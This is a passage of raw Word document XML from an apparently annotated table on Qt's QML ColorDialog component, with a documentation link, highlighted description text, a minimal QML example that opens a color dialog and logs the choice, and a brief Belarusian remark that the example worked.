            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>ColorDialog</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1843" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00FD51DE" w:rsidRPr="00763692" w:rsidRDefault="00490E7E" w:rsidP="00763692">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId1783" w:history="1">
              <w:r w:rsidR="00FD51DE" w:rsidRPr="00763692">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>http://doc.qt.io/qt-5/qml-qtquick-dialogs-colordialog.html</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00FD51DE" w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8080" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00FD51DE" w:rsidRPr="00763692" w:rsidRDefault="00FD51DE" w:rsidP="00763692">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Dialog component for choosing a color.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00FD51DE" w:rsidRPr="00763692" w:rsidRDefault="00490E7E" w:rsidP="00763692">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:i/>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId1784" w:history="1">
              <w:r w:rsidR="00FD51DE" w:rsidRPr="00763692">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:i/>
                  <w:color w:val="17A81A"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ColorDialog</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00FD51DE" w:rsidRPr="00763692">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:i/>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidR="00FD51DE" w:rsidRPr="00763692">
              <w:rPr>
                <w:i/>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">allows the user </w:t>
            </w:r>
            <w:r w:rsidR="00FD51DE" w:rsidRPr="00763692">
              <w:rPr>
                <w:i/>
                <w:color w:val="404244"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>to select a color</w:t>
            </w:r>
            <w:r w:rsidR="00FD51DE" w:rsidRPr="00763692">
              <w:rPr>
                <w:i/>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">. The dialog is initially invisible. You need </w:t>
            </w:r>
            <w:r w:rsidR="00FD51DE" w:rsidRPr="00763692">
              <w:rPr>
                <w:i/>
                <w:color w:val="404244"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>to set the properties as desired first</w:t>
            </w:r>
            <w:r w:rsidR="00FD51DE" w:rsidRPr="00763692">
              <w:rPr>
                <w:i/>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">, then </w:t>
            </w:r>
            <w:r w:rsidR="00FD51DE" w:rsidRPr="00763692">
              <w:rPr>
                <w:i/>
                <w:color w:val="404244"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>set</w:t>
            </w:r>
            <w:r w:rsidR="00FD51DE" w:rsidRPr="00763692">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:i/>
                <w:color w:val="404244"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:hyperlink r:id="rId1785" w:anchor="visible-prop" w:history="1">
              <w:r w:rsidR="00FD51DE" w:rsidRPr="00763692">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:i/>
                  <w:color w:val="17A81A"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>visible</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00FD51DE" w:rsidRPr="00763692">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:i/>
                <w:color w:val="404244"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidR="00FD51DE" w:rsidRPr="00763692">
              <w:rPr>
                <w:i/>
                <w:color w:val="404244"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>to true or call</w:t>
            </w:r>
            <w:r w:rsidR="00FD51DE" w:rsidRPr="00763692">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:i/>
                <w:color w:val="404244"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:hyperlink r:id="rId1786" w:anchor="open-method" w:history="1">
              <w:r w:rsidR="00FD51DE" w:rsidRPr="00763692">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:i/>
                  <w:color w:val="17A81A"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>open()</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00FD51DE" w:rsidRPr="00763692">
              <w:rPr>
                <w:i/>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00FD51DE" w:rsidRPr="00763692" w:rsidRDefault="00FD51DE" w:rsidP="00763692">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:i/>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:i/>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Here is a minimal example to open a color dialog and exit after the user chooses a color:</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kwd"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFF55"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>import</w:t>
            </w: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typ"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="4F9D08"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>QtQuick</w:t>
            </w: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lit"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FF55FF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>2.2</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kwd"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFF55"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>import</w:t>
            </w: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typ"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="4F9D08"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>QtQuick</w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rStyle w:val="typ"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="4F9D08"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Dialogs</w:t>
            </w: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lit"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FF55FF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>1.0</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p>
          <w:p w:rsidR="00FD51DE" w:rsidRPr="00763692" w:rsidRDefault="00490E7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hyperlink r:id="rId1787" w:history="1">
              <w:r w:rsidR="00FD51DE" w:rsidRPr="00763692">
                <w:rPr>
                  <w:rStyle w:val="typ"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                  <w:i/>
                  <w:color w:val="21BE2B"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ColorDialog</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00FD51DE" w:rsidRPr="00763692">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00FD51DE" w:rsidRPr="00763692">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>{</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pln"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">    id</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 xml:space="preserve"> colorDialog</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pln"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">    title</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str"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="AAAAAA"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>"Please choose a color"</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pln"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">    onAccepted</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pun"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>{</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pln"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">        console</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log</w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rStyle w:val="str"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="AAAAAA"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>"You chose: "</w:t>
            </w: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 xml:space="preserve"> colorDialog</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color</w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>)</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typ"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="4F9D08"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Qt</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quit</w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>()</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pun"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>}</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pln"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">    onRejected</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pun"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>{</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pln"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">        console</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log</w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rStyle w:val="str"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="AAAAAA"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>"Canceled"</w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>)</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typ"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="4F9D08"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Qt</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quit</w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>()</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pun"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00FD51DE" w:rsidRPr="00763692" w:rsidRDefault="00FD51DE" w:rsidP="00763692">
            <w:pPr>
              <w:pStyle w:val="HTML0"/>
              <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pP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typ"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="4F9D08"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Component</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onCompleted</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 xml:space="preserve"> visible </w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rStyle w:val="kwd"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFF55"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>true</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00FD51DE" w:rsidRPr="00763692" w:rsidRDefault="00FD51DE" w:rsidP="00763692">
            <w:pPr>
              <w:pStyle w:val="HTML0"/>
              <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00FD51DE" w:rsidRPr="00763692" w:rsidRDefault="00FD51DE" w:rsidP="00763692">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:i/>
                <w:color w:val="404244"/>
                <w:lang w:val="be-BY"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:i/>
                <w:color w:val="404244"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="be-BY"/>
              </w:rPr>
              <w:t>У мяне прыклад атрымаўся.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00FD51DE" w:rsidRPr="00763692" w:rsidRDefault="00FD51DE" w:rsidP="00763692">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:i/>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:i/>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>A</w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:i/>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:hyperlink r:id="rId1788" w:history="1">
              <w:r w:rsidRPr="00763692">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:i/>
                  <w:color w:val="17A81A"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ColorDialog</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:i/>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:i/>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">window is </w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:i/>
                <w:color w:val="404244"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>automatically transient for its parent window</w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:i/>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>. So whether you declare the dialog inside an</w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
